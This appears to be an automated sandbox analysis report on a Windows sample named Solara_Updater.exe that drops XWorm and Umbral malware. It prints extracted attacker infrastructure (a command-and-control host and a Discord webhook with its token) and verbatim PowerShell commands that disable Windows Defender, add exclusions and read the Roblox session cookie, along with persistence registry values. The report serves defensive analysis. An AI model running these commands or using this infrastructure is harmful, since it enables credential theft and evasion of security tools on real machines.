Analysis
max time kernel: 150s
max time network: 149s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 19-05-2024 16:14
Static task: static1
Behavioral task: behavioral1
Sample: Solara_Updater.exe
Resource: win7-20240508-en
General
-
Target
Solara_Updater.exe
-
Size
1.9MB
-
MD5
f4cffd7e6cca2b88bba1f19120e9255f
-
SHA1
28df62794d325206d1f61a400b5c5c682632e371
-
SHA256
4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf
-
SHA512
cb71ef2db087c012744fcac05033cab80947131029ae9bf59b57f85dd2f819e859f105919978a2af4334ac4b8f5b060f5f757b6898cb8fddd720a114b652bfe8
-
SSDEEP
49152:mH4Y2d/Pz0dB5h1qeU2V0ZBsvH1jBOtGQt/3c5DGqHQX+icSr:mH/QPz0d/pV0AvHLDh5HH4+i
Malware Config
Extracted
xworm
answer-riverside.gl.at.ply.gg:45691
-
Install_directory
%AppData%
-
install_file
svhost.exe
Extracted
umbral
https://discordapp.com/api/webhooks/1239665745831530598/iJT0OELt4O4igXW_VMu-CUIfcqaawXLhyC4Bruuv1t2x0XOvC0_p9dc-G_RxJMO7fn-V
Signatures
-
Detect Umbral payload 7 IoCs
resource yara_rule behavioral1/files/0x0008000000014508-40.dat family_umbral behavioral1/memory/2816-42-0x0000000000BA0000-0x0000000000BE0000-memory.dmp family_umbral behavioral1/memory/2828-126-0x0000000000320000-0x0000000000360000-memory.dmp family_umbral behavioral1/memory/2040-197-0x0000000001350000-0x0000000001390000-memory.dmp family_umbral behavioral1/memory/2396-377-0x0000000000310000-0x0000000000350000-memory.dmp family_umbral behavioral1/memory/2720-431-0x0000000000F50000-0x0000000000F90000-memory.dmp family_umbral behavioral1/memory/1080-516-0x00000000001E0000-0x0000000000220000-memory.dmp family_umbral -
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/files/0x0007000000014415-37.dat family_xworm behavioral1/memory/2020-39-0x0000000001190000-0x00000000011A6000-memory.dmp family_xworm behavioral1/memory/2440-226-0x00000000012C0000-0x00000000012D6000-memory.dmp family_xworm -
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description ioc Process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\", \"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\", \"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\"" bridgeblockportComBroker.exe
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2556 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2156 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2480 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2912 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2928 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1964 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 468 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2872 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3008 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2352 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 884 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2612 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2440 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 848 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 448 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1100 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1812 2596 schtasks.exe 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2988 2596 schtasks.exe 32
-
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 544 powershell.exe 2080 powershell.exe 1728 powershell.exe 1596 powershell.exe 2328 powershell.exe 1564 powershell.exe 2748 powershell.exe 1912 powershell.exe 2436 powershell.exe -
Drops file in Drivers directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk XClient.exe -
Executes dropped EXE 64 IoCs
pid Process 1332 Loader.exe 2888 sol.exe 2552 Loader.exe 2632 sol.exe 2020 XClient.exe 2816 RustCheat.exe 1488 Loader.exe 1808 sol.exe 2376 XClient.exe 1544 RustCheat.exe 2828 RustCheat.exe 2644 XClient.exe 2616 Loader.exe 800 sol.exe 2204 Loader.exe 2196 sol.exe 1256 XClient.exe 2476 RustCheat.exe 1516 Loader.exe 3044 sol.exe 2040 RustCheat.exe 2600 XClient.exe 1636 Loader.exe 2160 sol.exe 2716 Loader.exe 1716 sol.exe 2712 Loader.exe 2024 sol.exe 2944 Loader.exe 2632 sol.exe 2440 svhost.exe 1904 Loader.exe 2960 sol.exe 2432 Loader.exe 2000 sol.exe 824 Loader.exe 1064 sol.exe 2300 bridgeblockportComBroker.exe 1692 bridgeblockportComBroker.exe 3052 Loader.exe 1548 sol.exe 1624 bridgeblockportComBroker.exe 1356 Loader.exe 2140 sol.exe 2960 bridgeblockportComBroker.exe 996 Loader.exe 2428 sol.exe 1668 wscript.exe 2864 bridgeblockportComBroker.exe 1952 Loader.exe 344 sol.exe 2160 RustCheat.exe 2156 XClient.exe 308 Loader.exe 2260 sol.exe 2172 bridgeblockportComBroker.exe 2624 bridgeblockportComBroker.exe 1892 Loader.exe 2928 sol.exe 1084 bridgeblockportComBroker.exe 1060 sol.exe 1500 Loader.exe 2868 bridgeblockportComBroker.exe 3056 Loader.exe -
Loads dropped DLL 59 IoCs
pid Process 1596 cmd.exe 1596 cmd.exe 2148 cmd.exe 2532 cmd.exe 2324 cmd.exe 568 cmd.exe 748 cmd.exe 484 cmd.exe 908 cmd.exe 1304 cmd.exe 1080 cmd.exe 2280 cmd.exe 1748 cmd.exe 1568 cmd.exe 2652 cmd.exe 2704 cmd.exe 2864 cmd.exe 2196 cmd.exe 1764 cmd.exe 2068 cmd.exe 1332 cmd.exe 1780 cmd.exe 2744 cmd.exe 2984 cmd.exe 2196 cmd.exe 2840 cmd.exe 2192 cmd.exe 1692 cmd.exe 1068 cmd.exe 2376 cmd.exe 1660 cmd.exe 2792 cmd.exe 1564 cmd.exe 1580 cmd.exe 2512 cmd.exe 1376 cmd.exe 2172 cmd.exe 2984 cmd.exe 2100 cmd.exe 1516 cmd.exe 300 cmd.exe 2008 cmd.exe 2672 cmd.exe 1896 cmd.exe 2360 cmd.exe 2444 cmd.exe 2932 cmd.exe 1040 cmd.exe 1764 cmd.exe 2400 cmd.exe 2988 cmd.exe 1620 cmd.exe 2228 cmd.exe 2128 cmd.exe 3016 cmd.exe 2540 cmd.exe 2716 cmd.exe 2664 cmd.exe 2276 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 13 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\hostNet\\wscript.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\hostNet\\wscript.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" bridgeblockportComBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" XClient.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" bridgeblockportComBroker.exe
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 ipinfo.io 33 ip-api.com 58 ip-api.com 72 ip-api.com 74 ip-api.com 2 ip-api.com 7 ip-api.com 17 ip-api.com 29 ipinfo.io 44 ip-api.com 46 ip-api.com 69 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSC362901114F874F39A37D2928E62229.TMP csc.exe File created \??\c:\Windows\System32\hccjfr.exe csc.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Common Files\Services\wscript.exe bridgeblockportComBroker.exe File created C:\Program Files (x86)\Common Files\Services\817c8c8ec737a7 bridgeblockportComBroker.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\L2Schemas\WmiPrvSE.exe bridgeblockportComBroker.exe File opened for modification C:\Windows\L2Schemas\WmiPrvSE.exe bridgeblockportComBroker.exe File created C:\Windows\L2Schemas\24dbde2999530e bridgeblockportComBroker.exe File created C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe bridgeblockportComBroker.exe File created C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\69ddcba757bf72 bridgeblockportComBroker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 448 schtasks.exe 1816 schtasks.exe 2480 schtasks.exe 468 schtasks.exe 3008 schtasks.exe 2988 schtasks.exe 848 schtasks.exe 1100 schtasks.exe 2556 schtasks.exe 2912 schtasks.exe 1964 schtasks.exe 2352 schtasks.exe 884 schtasks.exe 2612 schtasks.exe 2440 schtasks.exe 1812 schtasks.exe 2156 schtasks.exe 2928 schtasks.exe 2872 schtasks.exe -
Detects videocard installed 1 TTPs 5 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1052 wmic.exe 2992 wmic.exe 1780 wmic.exe 2092 wmic.exe 1748 wmic.exe -
Modifies system certificate store
description ioc Process
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 bridgeblockportComBroker.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob bridgeblockportComBroker.exe
-
Runs ping.exe 1 TTPs 5 IoCs
pid Process 2672 PING.EXE 484 PING.EXE 2332 PING.EXE 2820 PING.EXE 2860 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2816 RustCheat.exe 1728 powershell.exe 2380 powershell.exe 2332 powershell.exe 720 powershell.exe 268 powershell.exe 1596 powershell.exe 2328 powershell.exe 2748 powershell.exe 1912 powershell.exe 2828 RustCheat.exe 544 powershell.exe 1980 powershell.exe 1712 powershell.exe 2704 powershell.exe 2964 powershell.exe 2300 bridgeblockportComBroker.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 1652 attrib.exe 1548 attrib.exe 2916 attrib.exe 1308 attrib.exe 2544 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1912
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"4⤵
- Creates scheduled task(s)
PID:1816
-
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"4⤵
- Views/modifies file attributes
PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:720
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:900
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:2312
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:2260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:268
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:2992
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause4⤵PID:2948
-
C:\Windows\system32\PING.EXEping localhost5⤵
- Runs ping.exe
PID:2672
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"3⤵PID:2664
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "4⤵
- Loads dropped DLL
PID:1596 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2300 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zshxbpuc\zshxbpuc.cmdline"6⤵PID:2368
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C67.tmp" "c:\Users\Admin\AppData\Roaming\CSCFBCF61A8141645BEAB9116A612B9A.TMP"7⤵PID:1344
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnve3ylj\gnve3ylj.cmdline"6⤵
- Drops file in System32 directory
PID:1408 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CA6.tmp" "c:\Windows\System32\CSC362901114F874F39A37D2928E62229.TMP"7⤵PID:268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\X6ugBa7n7B.bat"6⤵PID:2556
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:2560
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:2480
-
-
C:\Program Files (x86)\Common Files\Services\wscript.exe"C:\Program Files (x86)\Common Files\Services\wscript.exe"7⤵
- Executes dropped EXE
PID:1668
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"4⤵
- Executes dropped EXE
PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"4⤵PID:2656
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "5⤵
- Loads dropped DLL
PID:2148 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"6⤵
- Executes dropped EXE
PID:1692
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"4⤵
- Executes dropped EXE
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"5⤵
- Executes dropped EXE
PID:2644
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2828 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid6⤵PID:2028
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"6⤵
- Views/modifies file attributes
PID:1548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2704
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption6⤵PID:2604
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory6⤵PID:2720
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid6⤵PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2964
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name6⤵
- Detects videocard installed
PID:1780
-
-
